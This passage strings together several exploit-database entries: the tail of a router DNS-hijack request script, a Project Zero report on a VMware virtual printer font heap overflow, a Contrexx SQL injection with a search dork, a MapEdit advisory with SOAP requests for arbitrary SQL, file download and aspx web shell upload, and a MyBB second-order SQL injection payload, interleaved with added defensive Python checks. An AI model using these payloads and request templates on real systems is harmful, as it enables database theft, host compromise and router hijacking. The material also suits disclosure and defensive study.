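    the GET with a normal HTTP response)."""
    req = urllib.request.Request(url, headers={"User-Agent": "lwp-request/6.00"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    if len(sys.argv) not in (3, 4):
        sys.exit(f"usage: {sys.argv[0]} <target> <primary dns> [secondary dns]")
    url = build_dns_change_url(*sys.argv[1:])
    print("sending", url)
    print("status", send_dns_change(url))
```

The parser is the half a defender needs: run it over the web-proxy or IDS record of outbound HTTP from the LAN and any hit whose `primary` is not one of your own resolvers is a DNS hijack attempt against a CPE device.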
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=849
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a bug in the handling of TrueType fonts embedded in EMFSPOOL, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
TrueType fonts can be embedded in EMFSPOOL files via EMRI_ENGINE_FONT records. When such a record is encountered while processing the printing request data, some complex logic is executed to load the font into the program's internal structures. For reasons which are not fully clear to me, one of the operations is to copy the contents of the CMAP table into the NAME table in memory - or, if the latter is larger than the former, create a completely new NAME table with CMAP's data. This is generally implemented in a function located at address 0x1005C230, and the high-level logic is as follows:
--- cut ---
  CMAP = FindCmapTableHeader();
  CMAP_size = ExtractSize(CMAP);
  CMAP_body = ExtractBody(CMAP);
  NAME = FindNameTableHeader();
  if (NAME) {
    NAME_size = ExtractSize(NAME);
    NAME_body = ExtractBody(NAME);
    SetTableSize(NAME, CMAP_size);
    memset(NAME_body, 0, NAME_size);
    if (CMAP_size > NAME_size) {
      SetTableOffset(NAME, font_size);
      font_data = realloc(font_size + CMAP_size);
      memset(&font_data[font_size], 0, CMAP_size);
      memcpy(&font_data[font_size], CMAP_body, CMAP_size);
    } else {
      memcpy(NAME_body, CMAP_body, CMAP_size);
    }
  }
--- cut ---
As you can see, the function doesn't perform any bounds checking of the values (offsets, sizes) loaded from table headers. Some of the fields have already been verified before and are guaranteed to be valid at this point of execution, but some of them (such as CMAP_body or NAME_size) are still fully controlled. While controlling the pointer to the CMAP section data (relative to the start of the font buffer) may be useful, being able to cheat about the NAME table size enables an attacker to cause a much more dangerous memory corruption on the heap.
For example, if we set the NAME size to an enormous value (e.g. 0xAAAAAAAA), we will encounter an immediate crash in the memset() function, as shown below:
--- cut ---
(22f0.26ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ThinPrint\TPView.dll -
eax=01555540 ebx=00000000 ecx=215cefc0 edx=00000026 esi=215b87d4 edi=aaaaaaaa
eip=68102056 esp=2247f298 ebp=2247f2e8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
TPView!TPRenderW+0x1547f6:
68102056 660f7f4140 movdqa xmmword ptr [ecx+40h],xmm0 ds:002b:215cf000=????????????????????????????????
--- cut ---
If the NAME table size is increased by a smaller degree, such that the memset() call doesn't hit unmapped page boundary, the code may successfully finish the call and proceed to copying the contents of the CMAP section into the small NAME memory area, which would finally result in a typical heap-based buffer overflow condition with controlled length and data.
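The missing check is the one every sfnt table-directory reader needs: each record's offset and length must lie inside the buffer that was actually read. The Python below is an added example written for this report, not TPView code and not Project Zero's PoC: it parses a TrueType table directory with that check, then performs the same CMAP-into-NAME copy as the pseudocode above in a bounded form (zero the NAME body, overwrite it with CMAP, or append a new NAME body when CMAP is larger, and fix the NAME record). The `build_font` and `set_table_length` helpers exist only to construct minimal test fonts, including one with the NAME length set to 0xAAAAAAAA as in the report; they do not produce fonts a rasterizer would accept.

```python
import struct

SFNT_HEADER = struct.Struct(">IHHHH")   # sfntVersion, numTables, searchRange, entrySelector, rangeShift
TABLE_RECORD = struct.Struct(">4sIII")  # tag, checksum, offset, length
TRUETYPE_VERSIONS = (0x00010000, 0x74727565)  # 1.0 and 'true'


class FontError(ValueError):
    """Any directory value that would read or write outside the font buffer."""


def parse_table_directory(font):
    """Return {tag: (record_index, offset, length)} after bounds-checking every record."""
    if len(font) < SFNT_HEADER.size:
        raise FontError("truncated sfnt header")
    version, num_tables, _, _, _ = SFNT_HEADER.unpack_from(font, 0)
    if version not in TRUETYPE_VERSIONS:
        raise FontError(f"not a TrueType font: version {version:#x}")
    dir_end = SFNT_HEADER.size + num_tables * TABLE_RECORD.size
    if dir_end > len(font):
        raise FontError(f"table directory of {num_tables} records runs past end of font")
    tables = {}
    for i in range(num_tables):
        tag, _checksum, offset, length = TABLE_RECORD.unpack_from(
            font, SFNT_HEADER.size + i * TABLE_RECORD.size)
        # Written as `length > size - offset` rather than `offset + length > size` so the
        # same test stays correct in C, where offset + length can wrap in 32 bits.
        if offset < dir_end or offset > len(font) or length > len(font) - offset:
            raise FontError(f"table {tag!r}: offset {offset:#x} length {length:#x} "
                            f"outside a {len(font):#x}-byte font")
        tables[tag] = (i, offset, length)
    return tables


def copy_cmap_into_name(font):
    """Bounded version of the operation in the report: replace the NAME body with CMAP's
    data, appending a new body when CMAP is larger, and update the NAME record."""
    tables = parse_table_directory(font)
    if b"cmap" not in tables:
        raise FontError("no cmap table")
    _, cmap_off, cmap_len = tables[b"cmap"]
    cmap_body = font[cmap_off:cmap_off + cmap_len]
    if b"name" not in tables:
        return bytes(font)
    name_idx, name_off, name_len = tables[b"name"]
    out = bytearray(font)
    if cmap_len <= name_len:
        out[name_off:name_off + name_len] = bytes(name_len)  # the memset, now bounded
        out[name_off:name_off + cmap_len] = cmap_body
        new_off = name_off
    else:
        new_off = len(out)                                   # the realloc-and-append path
        out += cmap_body
    rec_off = SFNT_HEADER.size + name_idx * TABLE_RECORD.size
    struct.pack_into(">II", out, rec_off + 8, new_off, cmap_len)  # offset, length fields
    return bytes(out)


def build_font(tables):
    """Assemble a minimal sfnt from [(tag, body)] pairs. Constructed test input only."""
    num = len(tables)
    records, bodies, offset = b"", b"", SFNT_HEADER.size + num * TABLE_RECORD.size
    for tag, body in tables:
        records += TABLE_RECORD.pack(tag, 0, offset, len(body))
        bodies += body
        offset += len(body)
    return SFNT_HEADER.pack(0x00010000, num, 0, 0, 0) + records + bodies


def set_table_length(font, tag, length):
    """Overwrite one record's length field, as the report does with NAME = 0xAAAAAAAA."""
    idx, _, _ = parse_table_directory(font)[tag]
    out = bytearray(font)
    struct.pack_into(">I", out, SFNT_HEADER.size + idx * TABLE_RECORD.size + 12, length)
    return bytes(out)


if __name__ == "__main__":
    good = build_font([(b"cmap", b"C" * 16), (b"name", b"N" * 8)])
    print("good font:", parse_table_directory(copy_cmap_into_name(good)))
    bad = set_table_length(good, b"name", 0xAAAAAAAA)
    try:
        copy_cmap_into_name(bad)
    except FontError as e:
        print("rejected:", e)
```

With the check in place the 0xAAAAAAAA font is rejected before any memset or memcpy runs; without it, the same input drives the unbounded memset in the crash dump above.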
Attached is a Proof of Concept Python script, which connects to the COM1 serial port, and sends an EMFSPOOL structure containing a font file with the NAME table length set to 0xAAAAAAAA. When launched in a guest system, it should trigger the crash shown above in the vprintproxy.exe process on the host. The script is a slightly reworked version of Kostya's original exploit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40398.zip
# Exploit Title: Contrexx CMS egov module SQL Injection
# Google Dork: inurl:?section=egov
# Date: 12/9/2016
# Exploit Author: hamidreza borghei
# Software Link: https://www.cloudrexx.com/de/index.php?section=downloads&cmd=7&category=8
# Version: 1.0.0
# Tested on: linux
SQL injection in the id parameter:
http://server/index.php?section=egov&cmd=details&id=[sql query]
# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit
## Product
Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH
Product: MapEdit
Affected software version: 3.2.6.0
MuM MapEdit provides geodata to the internet and to intranets and is deployed on several communal
and regional governmental infrastructures to provide geodata to the population. It consists of a
Silverlight client and a C#.NET backend. The communication between them is HTTP/S based and uses
NBFS (.NET Binary Format SOAP).
Link: http://www.mum.de/DE_Autodesk-Topobase-GIS-Datenerfassung-MuM-MapEdit.CAD
## Status/Metrics/Identifier
CVE-ID: tbd
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CVSS Score: 9.0
The CVSS Score reflects the possibility of an attacker to upload web shells and execute them with
the privileges of the web server user.
## Author/Credits
Paul Baade (TÜV Rheinland i-sec GmbH)
Sven Krewitt (TÜV Rheinland i-sec GmbH)
## Fixed Versions
According to MuM, all described vulnerabilities are fixed in version 6.2.74; some of them are
reportedly already fixed in version 5.1.
## Authentication via GET Parameter
The application requires users to provide their credentials via GET parameters. They can therefore
end up in server logs or proxy logs. An example URL would be:
/Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...]
## Execution of arbitrary SQL commands on contained SQLite DBs
The application contains several SQLite databases. An authenticated user may send POST requests to
the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries
on the databases.
The content of the POST request is encoded in Microsoft's NBFS (.NET Binary Format SOAP) and can be
decoded to the following XML data:
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryData</a:Action>
<a:MessageID>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/DataAccessService.svc</a:To>
</s:Header>
<s:Body>
<QueryData>
<connection i:type="c:SQLiteConnection" xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess.SQLite">
<b:CurrentRepresentation>
<b:CollectionFeatureClassName/>
<b:Id>0</b:Id>
<b:LineFeatureClassName/>
<b:Name/>
<b:PointFeatureClassName/>
<b:PolygonFeatureClassName/>
</b:CurrentRepresentation>
<b:DbVersion>999</b:DbVersion>
<b:Id>0</b:Id>
<b:Name>SYSTEM</b:Name>
<b:StorageSchemaType>Unknown</b:StorageSchemaType>
<c:Filename>[path_to_MumGeoData]\System\System.db</c:Filename>
</connection>
<sql>select name, caption, version_systemdata from project where id in (select Project_id from usergroup_project where usergroup_id in (select usergroup_id from user_usergroup where user_id in (select id from user where name='TEST'))) order by caption</sql>
<queryDefinition xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Columns/>
<b:SRID>0</b:SRID>
</queryDefinition>
<parameterNames xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<parameterValues xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/>
<startRow>1</startRow>
<bufferSize>2000</bufferSize>
<limit>0</limit>
</QueryData>
</s:Body>
</s:Envelope>
The node "Filename" can be used to access different SQLite databases on the system, while the node
"sql" contains the SQL-query to be executed on the system.
Responses to this request are encoded in NBFS as well and can be decoded to the following XML data:
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:DataAccessService/QueryDataResponse</a:Action>
<a:RelatesTo>urn:uuid:b086a157-1bce-41be-b25c-492ab4f6dfa3</a:RelatesTo>
</s:Header>
<s:Body>
<QueryDataResponse>
<QueryDataResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess">
<c:Data>eNpjZAACZncXTwihYm6SlpiUammsa2hpaKlrkmhsrpuYamSpa2RkbGxpkZpsYZCSDAD4Jgsj</c:Data>
<c:FetchedAllRows>true</c:FetchedAllRows>
<c:ResultColumns>
<c:DbColumnDefinition>
<c:Caption>NAME</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>NAME</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>CAPTION</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>false</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>255</c:Length>
<c:Name>CAPTION</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
<c:DbColumnDefinition>
<c:Caption>VERSION_SYSTEMDATA</c:Caption>
<c:DataType>DbString</c:DataType>
<c:DefaultValue/>
<c:IsNullable>true</c:IsNullable>
<c:IsPrimaryKey>false</c:IsPrimaryKey>
<c:Length>40</c:Length>
<c:Name>VERSION_SYSTEMDATA</c:Name>
<c:Precision>0</c:Precision>
<c:Scale>0</c:Scale>
</c:DbColumnDefinition>
</c:ResultColumns>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</QueryDataResult>
</QueryDataResponse>
</s:Body>
</s:Envelope>
The "DbColumnDefinition" nodes contain the definitions of the returned columns; the "Data" node
contains the result of the SQL query as Base64-encoded, zlib-compressed data:
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
The same result is produced when the database is read locally:
>sqlite3 System.db
sqlite> select name, caption, version_systemdata from project where id
in (select Project_id from usergroup_project where usergroup_id
in (select usergroup_id from user_usergroup where user_id
in (select id from user where name='TEST'))) order by caption;
GDI|GDI|74fabe93-1919-4a37-ae29-223398ec80dc
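An added Python example (not MuM's code) that inspects a decoded QueryData request using the element names and namespaces shown above, applies the checks a hardened service would enforce on the Filename and sql nodes, and unpacks a response Data value. The request below is a constructed, trimmed copy of the one shown, and the NBFS-to-XML decoding step is assumed to have happened already.

```python
# Added example (not MuM code): inspect a decoded DataAccessService QueryData request
# with the element names and namespaces from the messages above, apply the checks a
# hardened service would enforce on its Filename and sql nodes, and unpack a response
# Data value. The NBFS-to-XML step is assumed to have happened already.
import base64
import xml.etree.ElementTree as ET
import zlib

NS = {
    "s": "http://www.w3.org/2003/05/soap-envelope",
    "a": "http://www.w3.org/2005/08/addressing",
    "c": "http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess.SQLite",
}


def summarize_query_request(xml_text: str) -> dict:
    """Extract the SOAP action, the SQLite file and the statement from a QueryData request."""
    root = ET.fromstring(xml_text)
    body = root.find("s:Body/QueryData", NS)
    if body is None:
        raise ValueError("not a QueryData request")
    return {
        "action": root.findtext("s:Header/a:Action", namespaces=NS),
        "filename": body.findtext("connection/c:Filename", namespaces=NS) or "",
        "sql": (body.findtext("sql") or "").strip(),
    }


def _norm(path: str) -> str:
    """Windows-style, case-folded form for prefix comparison (paths in the advisory use backslashes)."""
    return path.replace("/", "\\").lower()


def request_findings(summary: dict, data_root: str) -> list:
    """Policy a server should apply before executing the request: the database must sit
    under the application's data directory and the SQL must be one read-only SELECT."""
    findings = []
    filename = _norm(summary["filename"])
    if not filename.startswith(_norm(data_root).rstrip("\\") + "\\"):
        findings.append("Filename outside data root")
    if ".." in filename.split("\\"):
        findings.append("Filename contains '..'")
    sql = summary["sql"].lower()
    if not sql.startswith("select") or ";" in sql.rstrip("; "):
        findings.append("SQL is not a single SELECT")
    return findings


def decode_result_data(b64: str) -> str:
    """The Data node of a QueryDataResponse: base64 over zlib, as described above."""
    return zlib.decompress(base64.b64decode(b64)).decode("utf-8")


def encode_result_data(text: str) -> str:
    """Inverse of decode_result_data, used only to build a constructed response value."""
    return base64.b64encode(zlib.compress(text.encode("utf-8"))).decode("ascii")


# Constructed, trimmed copy of the decoded request shown above.
SAMPLE_REQUEST = """<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header><a:Action s:mustUnderstand="1">urn:DataAccessService/QueryData</a:Action></s:Header>
<s:Body><QueryData>
<connection i:type="c:SQLiteConnection" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.DataAccess.SQLite">
<c:Filename>[path_to_MumGeoData]\\System\\System.db</c:Filename>
</connection>
<sql>select name, caption, version_systemdata from project order by caption</sql>
<startRow>1</startRow><bufferSize>2000</bufferSize><limit>0</limit>
</QueryData></s:Body></s:Envelope>"""

if __name__ == "__main__":
    summary = summarize_query_request(SAMPLE_REQUEST)
    print(summary)
    print("findings:", request_findings(summary, "[path_to_MumGeoData]"))   # []
```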
## Arbitrary file manipulation
By sending POST requests to the URL /Mum.Geo.Services/IO.svc an authenticated user is able to
perform several actions.
Most interesting, from an attacker's point of view, would be the following:
- "GetFileNames", which lists the files in a given folder
- "DownloadFile", which lets the user download any file the web server has read-access to
- "UploadFile", which lets the user upload files to folders the web server has write-access to
The different activities are documented in the subsections below.
As in the SQL execution section, the request and response content is decoded from NBFS for
better readability.
### File exploration
An authenticated user is able to list all files in a given folder by sending the following content
to the IO Service.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNames</a:Action>
<a:MessageID>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<GetFileNames>
<path>[path_to_webroot]</path>
<searchPattern>*.*</searchPattern>
<recursive>false</recursive>
</GetFileNames>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/GetFileNamesResponse</a:Action>
<a:RelatesTo>urn:uuid:037dee48-520a-46ae-a47b-b9b57a901676</a:RelatesTo>
</s:Header>
<s:Body>
<GetFileNamesResponse>
<GetFileNamesResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter xmlns:c="http://schemas.datacontract.org/2004/07/Mum.Geo.IO">
<c:FileNames xmlns:d="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d:string>clientaccesspolicy.xml</d:string>
<d:string>crossdomain.xml</d:string>
<d:string>iisstart.htm</d:string>
<d:string>index.html</d:string>
<d:string>index.php</d:string>
<d:string>Thumbs.db</d:string>
<d:string>web.config</d:string>
<d:string>welcome.png</d:string>
</c:FileNames>
<c:Path>[path_to_webroot]</c:Path>
</b:Parameter>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</GetFileNamesResult>
</GetFileNamesResponse>
</s:Body>
</s:Envelope>
### Download of arbitrary files
The same web service can be abused to download any file that the web server user has read-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFile</a:Action>
<a:MessageID>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<DownloadFile>
<filename>[path_to_webroot]\Mum.Geo.Services\Admin.html</filename>
</DownloadFile>
</s:Body>
</s:Envelope>
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/DownloadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:48428e6d-19b5-42e2-ad6c-6bfde4849504</a:RelatesTo>
</s:Header>
<s:Body>
<DownloadFileResponse>
<DownloadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Server.Core.IO" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Data>[base64-encoded file contents omitted]</b:Data>
<b:FileNotFound>false</b:FileNotFound>
<b:IsComplete>true</b:IsComplete>
</DownloadFileResult>
</DownloadFileResponse>
</s:Body>
</s:Envelope>
The node "Data" itself can be base64-decoded, to receive the file contents:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Admin</title>
<meta http-equiv="refresh" content="0; URL=Start.aspx?AdminMode=true"/>
</head>
<body>
<p><a href="Start.aspx?AdminMode=true">Start Mum Administrator</a></p>
</body>
</html>
### Upload of arbitrary files
The web service can be abused to upload a file to any folder that the web server user has
write-access to.
Request:
--------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFile</a:Action>
<a:MessageID>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:MessageID>
<a:SequenceAcknowledgement>
<a:ReplyTo>http://www.w3.org/2005/08/addressing/anonymous</a:ReplyTo>
</a:SequenceAcknowledgement>
<a:To s:mustUnderstand="1">http://[host]/Mum.Geo.Services/IO.svc</a:To>
</s:Header>
<s:Body>
<UploadFile>
<clientFilename/>
<serverFilename>[path_to_webroot]\MumGeoData\Userdata\GDI\isec.aspx</serverFilename>
<temporaryServerFilename>[path_to_MumGeoData]\Userdata\GDI\e41279bd-343d-48a1-a413-05e1b3c50f40\Bookmarks\Bookmarks.sod.tmp636008925231332626</temporaryServerFilename>
<data>[base64-encoded payload omitted]</data>
<append>false</append>
<completed>true</completed>
</UploadFile>
</s:Body>
</s:Envelope>
The "data" node contains a base64-encoded, zlib-packed aspx web shell. It can be used to issue
arbitrary commands on the compromised host.
Response:
---------
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">urn:IO/UploadFileResponse</a:Action>
<a:RelatesTo>urn:uuid:20cca52e-da4c-4981-a433-eb596411d89a</a:RelatesTo>
</s:Header>
<s:Body>
<UploadFileResponse>
<UploadFileResult xmlns:b="http://schemas.datacontract.org/2004/07/Mum.Geo.Core" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<b:Parameter/>
<b:State>
<b:Tags>
<b:Item i:nil="true"/>
</b:Tags>
<b:ExceptionMessage/>
<b:StackTrace/>
<b:Succeeded>true</b:Succeeded>
</b:State>
</UploadFileResult>
</UploadFileResponse>
</s:Body>
</s:Envelope>
## Base64 encoded Passwords
In the database file \MumGeoData\System\System.db, passwords are stored in the tables "user" and
"connection". Both tables store their passwords in plain text with base64 encoding applied.
Example:
sqlite> select * from user where name='MUM';
<User GUID>|MUM|<base64 encoded password>|1||
## Remark about information disclosures
Observing the communication between a MapEdit Silverlight client and its backend server, various
pieces of information could be gathered, particularly file paths and license keys. Additionally,
the error messages that the server generates disclose quite a lot of information about the backend
parsing process.
## History
2016-06-07 Discovery of mentioned vulnerabilities
2016-06-09 First contact with MuM
2016-06-23 Confirmation of mentioned vulnerabilities
2016-07-29 Release of version 6.2.74
2016-09-13 Public disclosure
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: MyBB 1.8.6
Fixed in: 1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a
second order SQL injection by an authenticated admin user, allowing the
extraction of data from the database.
3. Details
Description
CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P
The setting threadsperpage is vulnerable to second order error based SQL
injection. An admin account is needed to change this setting.
The injection takes place in a LIMIT clause, and the query also uses ORDER BY, which makes a
UNION ALL injection impossible, but it is still possible to extract information.
Proof of Concept
Go to the settings page:
http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7
For Setting "threadsperpage" use:
20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Visit a forum to trigger injected code:
http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3
The result will be:
SQL Error:
1105 - XPATH syntax error: ':5.5.33-1'
Query:
SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Code
forumdisplay.php
$perpage = $mybb->settings['threadsperpage'];
[...]
$query = $db->query("
    SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
    FROM ".TABLE_PREFIX."threads t
    LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
    WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2
    ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2
    LIMIT $start, $perpage
");
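An added Python example (not MyBB code) of the two defensive measures this bug calls for: validating the per-page setting at the point of use rather than trusting the stored value, and auditing stored integer settings for trailing text, which is how a second-order payload like the one above survives until forumdisplay.php interpolates it. The setting rows are constructed; only threadsperpage is taken from the advisory.

```python
# Added example (not MyBB code): validate the per-page setting at the point of use and
# flag stored integer settings that carry extra text, which is how a second-order
# payload like the one above survives until forumdisplay.php interpolates it.
import re

DIGITS = re.compile(r"[0-9]+")

# Settings that must be whole numbers. threadsperpage is from the advisory; the second
# name is an assumed entry for illustration.
INTEGER_SETTINGS = {"threadsperpage", "postsperpage"}


def coerce_setting(value: str) -> int:
    """Strict equivalent of the cast a fix applies: the whole string must be digits."""
    if not DIGITS.fullmatch(value.strip()):
        raise ValueError("setting is not an integer: %r" % value)
    return int(value)


def limit_clause(start, perpage) -> str:
    """Build `LIMIT start, perpage` only from non-negative int values. A str is refused,
    so an unvalidated setting cannot be interpolated here by accident."""
    for name, value in (("start", start), ("perpage", perpage)):
        if isinstance(value, bool) or not isinstance(value, int) or value < 0:
            raise ValueError("%s must be a non-negative integer, got %r" % (name, value))
    return "LIMIT %d, %d" % (start, perpage)


def audit_settings(rows, integer_settings=INTEGER_SETTINGS) -> list:
    """Return (name, value) pairs for integer settings whose stored value is not all digits."""
    return [(name, value) for name, value in rows
            if name in integer_settings and not DIGITS.fullmatch(value.strip())]


# Constructed settings rows; the first value is the payload quoted in the advisory.
PAYLOAD = "20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);"
SAMPLE_ROWS = [
    ("threadsperpage", PAYLOAD),
    ("postsperpage", "20"),
    ("bbname", "My Board"),
]

if __name__ == "__main__":
    print("poisoned settings:", audit_settings(SAMPLE_ROWS))
    print(limit_clause(0, coerce_setting("20")))   # LIMIT 0, 20
```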
4. Solution
To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Kajona 4.7
Fixed in: 5.0
